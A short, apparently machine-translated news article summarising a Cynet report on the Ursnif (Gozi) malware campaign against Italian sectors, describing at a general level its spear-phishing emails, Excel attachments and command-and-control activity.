From a recent report by Cynet, the Israeli cybersecurity agency, it emerges that the group Ursnif has intensified cyber attacks on Italy. Ursnif is a criminal group also known as Gozi, and has a long history of cyber attacks behind it. The data are particularly alarming, as they highlight a particularly widespread trend of attacks aimed exclusively at Italian customers.
Ursnif’s purpose would seem to be primarily that of data exfiltration. However, several attacks have been observed variants that add capabilities such as:
- backdoor: lines of computer code thanks to which a user can enter as an administrator on websites and computers. All without having any authorized access.
- spyware: software that collects information regarding a user’s online activity without their consent.
In particular the attacks appear to be aimed at the health sector, the armed forces, e-commerce but also to glarge distribution and industry.
Cyber attacks: how Ursnif works
In general, the attacks encountered have in common a preliminary activity of spearfishing. This, which differs from phishing in the personalization of the message, takes place through information found online. The attack is then carried out using information from the victimso that the email is personalized and linked to a service actually used by the target.
At this point the victim is asked to fill in an attached form – in this case an EXCEL file – which contains the malicious payload. Cybercriminals just have to download and run a DLL by crashing regsvr32 – a Windows system file capable of manipulate other programs and monitor applications – to activate a Command-and-control server for the victim’s environment.
“The primary goal of the Ursnif group is data theft for the purpose of receiving unauthorized gains and other attacks using the information there,” he says. Marco Lucchina, Channel Manager Italy, Spain & Portugal of Cynet. “Ursnif has already been reported in several phishing campaigns in recent weeks, associated with messages such as ‘Receipt AgenziaEntrate’ or ‘DHL reminder’ but, thanks to the activity carried out by our Orion Group (Threat Intelligence), we have detected much more use broad and targeted attacks tailored to individual clients.
Furthermore, the fact that Cynet detected and blocked the threat the moment the user double-clicked triggering the first malicious payload, means that previous protection levels such as antispam and user training were not sufficiently effective. ‘alarm indicating the importance of adopting a’ defense in depth ‘”.